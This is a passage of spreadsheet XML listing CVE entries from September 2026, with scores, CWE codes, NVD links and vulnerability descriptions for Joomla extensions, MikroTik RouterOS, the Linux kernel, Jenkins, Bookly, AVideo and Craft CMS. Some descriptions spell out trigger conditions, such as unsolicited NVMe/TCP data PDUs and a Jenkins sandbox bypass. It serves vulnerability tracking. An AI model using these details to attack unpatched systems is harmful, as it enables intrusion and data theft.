      <c r="E663" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F663" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr"/>
      <c r="L663" s="5" t="inlineStr"/>
      <c r="M663" s="5" t="inlineStr"/>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr"/>
      <c r="Q663" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R663" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via url option in Snippets Free extension for Joomla &lt; 7.0.0, Snippets Pro extension for Joomla &lt; 11.0.0 - Snippets substitutes variable values supplied by an article tag into saved Snippet content. The affected versions do not consider the article author's trust level. A lower-privileged author can therefore place an unsafe value into a security-sensitive position chosen by the trusted Snippet author.</t>
        </is>
      </c>
      <c r="S663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88852</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88853</t>
        </is>
      </c>
      <c r="D664" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E664" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F664" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr"/>
      <c r="L664" s="5" t="inlineStr"/>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr"/>
      <c r="Q664" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R664" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via event handler option in Modals Pro extension for Joomla &lt; 17.0.0 - Modals Pro intentionally supports JavaScript Events such as on-open and on-closed. Affected versions do not distinguish trusted extension configuration from event code supplied in ordinary article content. A lower-privileged author can therefore use a documented executable feature which should be reserved for trusted authors.</t>
        </is>
      </c>
      <c r="S664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88853</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89028</t>
        </is>
      </c>
      <c r="D665" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E665" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="inlineStr"/>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr"/>
      <c r="L665" s="5" t="inlineStr"/>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr"/>
      <c r="Q665" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="R665" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS before 7.24 contains a heap memory corruption vulnerability in the userspace SMB daemon that allows remote attackers to corrupt adjacent heap memory by supplying a crafted uniPwdLen value in the SMB1 SessionSetupAndX handler. An attacker can send a malformed SMB1 request with a uniPwdLen field that triggers an integer underflow, causing the resulting value to be used as the copy length in a memory copy operation into a smaller heap buffer, corrupting adjacent heap memory.</t>
        </is>
      </c>
      <c r="S665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89028</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89063</t>
        </is>
      </c>
      <c r="D666" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E666" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr"/>
      <c r="L666" s="5" t="inlineStr"/>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr"/>
      <c r="Q666" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R666" s="5" t="inlineStr">
        <is>
          <t>The Online Scheduling and Appointment Booking System – Bookly plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 28.1 via the 'conversation_id' parameter due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to read the full AI booking conversation transcript of any customer — leaking names, email addresses, phone numbers, and appointment details echoed by the assistant — and inject arbitrary messages into any victim conversation that are subsequently replayed to the Cloud AI worker along with the full private history. Because AI conversations are stored with no owner, user, or session identifier and conversation IDs are sequential integers, an unauthenticated attacker can enumerate all customer conversations simply by incrementing the conversation_id parameter.</t>
        </is>
      </c>
      <c r="S666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89063</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89863</t>
        </is>
      </c>
      <c r="D667" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E667" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F667" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="inlineStr"/>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr"/>
      <c r="L667" s="5" t="inlineStr"/>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr"/>
      <c r="Q667" s="5" t="inlineStr"/>
      <c r="R667" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: edif: Fix NULL pointer deref in RX SA delete check
qla_chk_edif_rx_sa_delete_pending() obtains the SCSI command via
GET_CMD_SP(sp) and immediately dereferences cmd-&gt;sc_data_direction.
That command pointer can be NULL: the firmware may post a status
completion for a command that has already been returned or aborted.  The
caller qla2x00_status_entry() acknowledges this on the very same status
path, re-fetching GET_CMD_SP(sp) and bailing out with the "Command
already returned" message when it is NULL -- but that check runs only
after qla_chk_edif_rx_sa_delete_pending() has already dereferenced the
pointer, so a NULL cmd crashes the kernel in interrupt context.
Return early when cmd is NULL, before touching cmd-&gt;sc_data_direction.</t>
        </is>
      </c>
      <c r="S667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89863</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89897</t>
        </is>
      </c>
      <c r="D668" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E668" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F668" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="inlineStr"/>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr"/>
      <c r="K668" s="5" t="inlineStr"/>
      <c r="L668" s="5" t="inlineStr"/>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr"/>
      <c r="Q668" s="5" t="inlineStr"/>
      <c r="R668" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cec: Serialize exclusive follower delivery
cec_receive_notify() reads the exclusive follower pointer without the
adapter lock. Serialize the no-follower check and message delivery
against mode changes and release.</t>
        </is>
      </c>
      <c r="S668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89897</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89968</t>
        </is>
      </c>
      <c r="D669" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E669" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F669" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="inlineStr"/>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr"/>
      <c r="L669" s="5" t="inlineStr"/>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr"/>
      <c r="Q669" s="5" t="inlineStr"/>
      <c r="R669" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet-tcp: reject unsolicited H2CData PDUs
nvmet_tcp_handle_h2c_data_pdu() accepts an H2CData PDU after only checking
that its TTAG is a valid in-range command index and that the command's
data buffers are mapped. It never checks that the target has actually
solicited that data by sending an R2T for the command.
A remote host can abuse this. It submits a write command that takes the
R2T path and, before the target transmits the R2T, sends an H2CData PDU
for that command's tag. The data completes the command early, and when
the command then fails synchronously (e.g. a length mismatch caught by
nvmet_check_transfer_len()), it is completed a second time. Each
completion calls nvmet_tcp_queue_response(), so the same command is added
to queue-&gt;resp_list twice while it is still linked; the second llist_add()
makes the node point to itself (lentry-&gt;next == lentry).
nvmet_tcp_process_resp_list() then walks that self-referential node and
adds the command to resp_send_list twice. With CONFIG_DEBUG_LIST this
trips the "list_add double add" check (kernel BUG); without it the loop
never terminates and the nvmet_tcp workqueue wedges (soft-lockup). It is
remotely triggerable and needs no authentication on an allow_any_host
subsystem.
Track whether an R2T has been transmitted for a command and reject an
H2CData PDU that arrives before it. The flag is cleared on command reuse
(nvmet_tcp_get_cmd() zeroes cmd-&gt;flags) and stays set across the multiple
H2CData PDUs of a single solicited transfer.</t>
        </is>
      </c>
      <c r="S669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89968</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89971</t>
        </is>
      </c>
      <c r="D670" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E670" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F670" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="inlineStr"/>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr"/>
      <c r="L670" s="5" t="inlineStr"/>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr"/>
      <c r="Q670" s="5" t="inlineStr"/>
      <c r="R670" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme: skip the zoned limits update if the zone info query failed
nvme_query_zone_info() returns either a negative errno or a positive
NVMe status code, but nvme_update_ns_info_block() only tests for the
negative case:
	ret = nvme_query_zone_info(ns, lbaf, &amp;zi);
	if (ret &lt; 0)
		goto out;
If the device fails the Identify Namespace (I/O Command Set specific)
command, or the Identify Controller command issued by
nvme_set_max_append(), the positive status falls through and setup
continues with the zero-initialized zone info.  nvme_update_zone_info()
then marks the queue zoned with chunk_sectors and ns-&gt;head-&gt;zsze set to
zero.
blk_validate_zoned_limits() does not check chunk_sectors, so the limits
commit succeeds.  blk_revalidate_disk_zones() does reject the zero zone
size, but by then the limits are live and nothing rolls them back, so
I/O keeps being submitted to a zoned queue with a zero zone size and
disk_zone_no() shifts by ilog2(0):
  nvme0n1: Invalid non power of two zone size (0)
  UBSAN: shift-out-of-bounds in include/linux/blkdev.h:747:16
  shift exponent -1 is negative
   disk_zone_no include/linux/blkdev.h:747 [inline]
   bio_straddles_zones include/linux/blkdev.h:1058 [inline]
   blk_zone_wplug_handle_write block/blk-zoned.c:1423 [inline]
   blk_zone_plug_bio.cold+0x25/0x1c8 block/blk-zoned.c:1605
   blk_mq_submit_bio+0x18fb/0x2870 block/blk-mq.c:3196
   submit_bh_wbc+0x575/0x740 fs/buffer.c:2824
   __block_write_full_folio+0x728/0xdd0 fs/buffer.c:1933
Any device, firmware or NVMe-oF target that fails this one command
reaches this.
Skip the zoned limits update in that case, and log which of the two
things happened: during a revalidation the queue keeps the zone
geometry it was last validated with, and on a first scan the namespace
is registered without zoned limits, so that it is still available as a
handle for admin commands.  Neither of the paths in
nvme_query_zone_info() that return a positive status logs anything, so
the failure would otherwise be silent.
zi.zone_size is an exact indicator: every path that returns a positive
status returns before it is assigned, and after that the only failure
left is -ENODEV, which the caller already handles.
Found by FuzzNvme.</t>
        </is>
      </c>
      <c r="S670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89971</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89974</t>
        </is>
      </c>
      <c r="D671" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E671" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F671" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="inlineStr"/>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr"/>
      <c r="K671" s="5" t="inlineStr"/>
      <c r="L671" s="5" t="inlineStr"/>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr"/>
      <c r="Q671" s="5" t="inlineStr"/>
      <c r="R671" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-fc: fix double free of fabrics options when nvme_add_ctrl() fails
nvmf_create_ctrl() owns the fabrics options and frees them whenever
-&gt;create_ctrl() returns an error, so a transport must not free them on
its own error paths.  nvme-fc tracks this by testing ctrl-&gt;ctrl.opts in
nvme_fc_ctrl_free(), which requires nvme_fc_init_ctrl() to clear that
pointer on every error exit.
The coupling is implicit, and commit 1a9e218195a5 ("nvme: split device
add from initialization") broke it by adding a second error exit.  When
nvme_add_ctrl() fails, nvme_fc_init_ctrl() jumps to out_put_ctrl:, past
the "ctrl-&gt;ctrl.opts = NULL" that only sits on the fail_ctrl: path, so
nvme_fc_ctrl_free() frees the options and nvmf_create_ctrl() frees them
a second time:
  BUG: KASAN: slab-use-after-free in nvmf_free_options+0x30/0x190
   nvmf_free_options+0x30/0x190 drivers/nvme/host/fabrics.c:1284
   nvmf_create_ctrl drivers/nvme/host/fabrics.c:1374 [inline]
  Freed by task 5534:
   nvme_fc_ctrl_free drivers/nvme/host/fc.c:2374 [inline]
   nvme_fc_init_ctrl+0xe17/0x1450 drivers/nvme/host/fc.c:3605
nvme_add_ctrl() fails when dev_set_name() cannot allocate, so this is
reachable under memory pressure or fault injection.  Without KASAN the
options are freed twice.
Rather than clear the pointer on the second exit as well, derive
ownership the way nvme-tcp, nvme-rdma and nvme-loop do, from list
membership: their free_ctrl leaves the options alone unless the
controller made it onto the transport list.
The list cannot simply be populated on the success path as it is there.
nvme-fc runs the initial connect synchronously via flush_delayed_work(),
and the controller has to be reachable on rport-&gt;ctrl_list for the whole
of it: nvme_fc_unregister_remoteport() needs to find it to signal
connectivity loss, nvme_fc_match_disconn_ls() matches an incoming
Disconnect Association LS against ctrl-&gt;association_id, which is only
assigned during that window, nvme_fc_resume_controller() needs it on
remoteport re-registration, and nvme_fc_existing_controller() uses it to
reject a duplicate connect racing the one in flight.
Keep the insertion where it is and add a fail_unlist: label, falling
into fail_ctrl:, for the error paths that run after it.  The earlier
error paths never reach the insertion and keep using fail_ctrl:
directly, so the list is only touched where the controller is actually
on it.
nvme_fc_ctrl_free() cannot use the plain "goto free_ctrl" the other
transports use, because it still has to put_device(), release the rport
reference and free the ida entry for resources taken before the
insertion.  Sample list_empty() under rport-&gt;lock instead.
ctrl-&gt;ctrl.opts also stays valid for the whole teardown now.  That is
not the bug being fixed, but it removes some fragility around the old
idiom: nvme_free_ctrl() calls nvme_auth_free() before -&gt;free_ctrl(), and
ctrl_max_dhchaps() dereferences ctrl-&gt;opts without a NULL check when
ctrl-&gt;dhchap_ctxs is set, which nvme-fc permits since NVMF_ALLOWED_OPTS
allows the dhchap options.  The nvme sysfs attributes that dereference
ctrl-&gt;opts, such as hostnqn and address, evaluate their is_visible()
test once at device_add() time and stay readable until
cdev_device_del().</t>
        </is>
      </c>
      <c r="S671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89974</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92128</t>
        </is>
      </c>
      <c r="D672" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E672" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F672" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="inlineStr"/>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K672" s="5" t="inlineStr"/>
      <c r="L672" s="5" t="inlineStr"/>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr"/>
      <c r="Q672" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R672" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier downloads a JAR file specified by URL twice, confirming the approval of the first download and loading the classpath entries from the second, allowing attackers able to define classpath entries to execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92128</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92129</t>
        </is>
      </c>
      <c r="D673" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E673" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F673" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="inlineStr"/>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K673" s="5" t="inlineStr"/>
      <c r="L673" s="5" t="inlineStr"/>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr"/>
      <c r="Q673" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R673" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not check calls from sandboxed scripts to methods added dynamically to a class at runtime, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute code outside the sandbox.</t>
        </is>
      </c>
      <c r="S673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92129</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92577</t>
        </is>
      </c>
      <c r="D674" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E674" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="inlineStr"/>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr"/>
      <c r="K674" s="5" t="inlineStr"/>
      <c r="L674" s="5" t="inlineStr"/>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr"/>
      <c r="Q674" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R674" s="5" t="inlineStr">
        <is>
          <t>In AVideo through 29.0, the API get_api_video endpoint contains a broken access control vulnerability in the clean_title branch that returns user-group-restricted videos with owner PII to anonymous callers. Attackers can query videos by their public slug to bypass group restrictions and retrieve sensitive user fields including email, phone, address, birth date, and administrator status.</t>
        </is>
      </c>
      <c r="S674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92577</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92594</t>
        </is>
      </c>
      <c r="D675" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E675" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="inlineStr"/>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr"/>
      <c r="L675" s="5" t="inlineStr"/>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr"/>
      <c r="Q675" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R675" s="5" t="inlineStr">
        <is>
          <t>Craft CMS 5.0.0-RC1 through versions before 5.11.0 incorrectly authorize the GraphQL draftCreator and revisionCreator fields: instead of requiring the user-data scope enforced by Gql::canQueryUsers() (usergroups.*:read), these fields are gated only on the elements.drafts:read / elements.revisions:read scopes, and their resolver returns a raw User element whose email, username, fullName, and addresses fields have no per-field authorization. A client holding only the drafts or revisions scope — including an unauthenticated client when the operator has enabled the public GraphQL schema with those scopes — can therefore harvest the email addresses, usernames, full names, and postal addresses of all draft/revision creators (typically site editors and administrators). The issue is fixed in 5.11.0.</t>
        </is>
      </c>
      <c r="S675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92594</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92596</t>
        </is>
      </c>
      <c r="D676" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E676" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="inlineStr"/>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr"/>
      <c r="L676" s="5" t="inlineStr"/>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr"/>
      <c r="Q676" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R676" s="5" t="inlineStr">
        <is>
